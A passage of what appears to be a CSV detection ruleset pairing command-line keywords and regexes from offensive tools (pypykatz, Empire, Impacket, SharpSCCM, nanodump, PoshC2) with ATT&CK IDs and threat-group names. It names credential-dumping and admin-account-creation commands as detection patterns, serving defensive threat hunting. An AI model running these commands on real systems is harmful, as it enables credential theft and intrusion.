"* live kerberos sessions*",".{0,1000}\slive\skerberos\ssessions.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1975"
"* live kerberos tgt*",".{0,1000}\slive\skerberos\stgt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1976"
"* live kerberos triage*",".{0,1000}\slive\skerberos\striage.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1977"
"* live lsa -o *",".{0,1000}\slive\slsa\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1978"
"* live lsa -o *",".{0,1000}\slive\slsa\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1979"
"* live process create -c regedit*",".{0,1000}\slive\sprocess\screate\s\-c\sregedit.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1980"
"* live smb client *",".{0,1000}\slive\ssmb\sclient\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1981"
"* live smb dcsync *",".{0,1000}\slive\ssmb\sdcsync\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1982"
"* live smb lsassdump *",".{0,1000}\slive\ssmb\slsassdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1983"
"* live smb regdump *",".{0,1000}\slive\ssmb\sregdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1984"
"* live smb secretsdump *",".{0,1000}\slive\ssmb\ssecretsdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1985"
"* live smbapi localgroup enum -t*",".{0,1000}\slive\ssmbapi\slocalgroup\senum\s\-t.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1986"
"* live smbapi session enum *",".{0,1000}\slive\ssmbapi\ssession\senum\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1987"
"* live smbapi share enum*",".{0,1000}\slive\ssmbapi\sshare\senum.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1988"
"* live users whoami*",".{0,1000}\slive\susers\swhoami.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1989"
"* llmnr-resolve.nse*",".{0,1000}\sllmnr\-resolve\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1990"
"* -LLMNRTTL *",".{0,1000}\s\-LLMNRTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1991"
"* -llmnrtypes AAAA*",".{0,1000}\s\-llmnrtypes\sAAAA.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","1992"
"* lltd-discovery.nse*",".{0,1000}\slltd\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1993"
"* --llvm-obfuscator * ",".{0,1000}\s\-\-llvm\-obfuscator\s.{0,1000}\s","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","1994"
"* LMHASH:NTHASH*",".{0,1000}\sLMHASH\:NTHASH.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1995"
"* lnkbomb.py*",".{0,1000}\slnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","1996"
"* -LNKPath * -EncScript *",".{0,1000}\s\-LNKPath\s.{0,1000}\s\-EncScript\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-BackdoorLNK.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1997"
"* load_extra_pots*",".{0,1000}\sload_extra_pots.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1998"
"* loadbalancer.py*",".{0,1000}\sloadbalancer\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1999"
"* --load-dll *ssp.dll*",".{0,1000}\s\-\-load\-dll\s.{0,1000}ssp\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","2000"
"*----- LOADLIBRARYA HOOK -----*",".{0,1000}\-\-\-\-\-\sLOADLIBRARYA\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","3","N/A","N/A","N/A","N/A","2001"
"* --load-shellcode *",".{0,1000}\s\-\-load\-shellcode\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","2002"
"* local class-instances SMS_Authority*",".{0,1000}\slocal\sclass\-instances\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2003"
"* local class-properties SMS_Authority*",".{0,1000}\slocal\sclass\-properties\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2004"
"* -local dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA*",".{0,1000}\s\-local\sdc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","2005"
"* local grep *ccmsetup started *ccmsetup.log*",".{0,1000}\slocal\sgrep\s.{0,1000}ccmsetup\sstarted\s.{0,1000}ccmsetup\.log.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2006"
"* local query * FROM SMS_Authority*",".{0,1000}\slocal\squery\s.{0,1000}\sFROM\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2007"
"* local secrets -m disk*",".{0,1000}\slocal\ssecrets\s\-m\sdisk.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2008"
"* local secrets -m wmi*",".{0,1000}\slocal\ssecrets\s\-m\swmi.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2009"
"* Local:DPAPIDecrypt*",".{0,1000}\sLocal\:DPAPIDecrypt.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","2010"
"* Local:LoadEncryptionDll*",".{0,1000}\sLocal\:LoadEncryptionDll.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","2011"
"* local_execution_linux.exe*",".{0,1000}\slocal_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","#linux","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2012"
"* local_map.exe*",".{0,1000}\slocal_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2013"
"* local_thread_hijacking.exe*",".{0,1000}\slocal_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2014"
"* LocalAdminAccess.txt*",".{0,1000}\sLocalAdminAccess\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","2015"
"* --localadminsessionenum *",".{0,1000}\s\-\-localadminsessionenum\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","2016"
"* --local-auth --shares*",".{0,1000}\s\-\-local\-auth\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2017"
"* localbrute.ps1*",".{0,1000}\slocalbrute\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2018"
"* --LocalGMEnum --Host *",".{0,1000}\s\s\-\-LocalGMEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","2019"
"* localgroup administrators BitdefenderBounty *",".{0,1000}\slocalgroup\sadministrators\sBitdefenderBounty\s.{0,1000}","offensive_tool_keyword","Dispossessor","user name used in Dispossessor ransomware group notes - adding to admin group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2020"
"* localgroup administrators pwnd /add*",".{0,1000}\slocalgroup\sadministrators\spwnd\s\/add.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#windows","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","2022"
"* -LocalPoshC2ProjectDir *",".{0,1000}\s\-LocalPoshC2ProjectDir\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2023"
"* -LocalPoshC2ProjectDir *",".{0,1000}\s\-LocalPoshC2ProjectDir\s.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm 